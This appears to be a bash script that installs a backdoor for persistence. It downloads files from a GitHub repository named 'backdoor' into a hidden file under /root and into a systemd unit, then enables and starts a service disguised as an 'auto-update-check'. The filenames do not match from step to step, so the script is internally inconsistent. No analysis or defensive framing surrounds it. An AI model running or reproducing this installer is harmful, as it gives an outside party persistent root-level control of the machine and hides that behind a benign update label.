#!/bin/bash
curl -s https://raw.githubusercontent.com/Hussnain-Khan/backdoor/main/core-launch > /root/.core-launch
chmod +x /root/.auto-update-check
curl -s https://raw.githubusercontent.com/Hussnain-Khan/backdoor/main/agent.service > /etc/systemd/system/agent.service
systemctl daemon-reload
systemctl enable auto-update-check
systemctl start auto-update-check
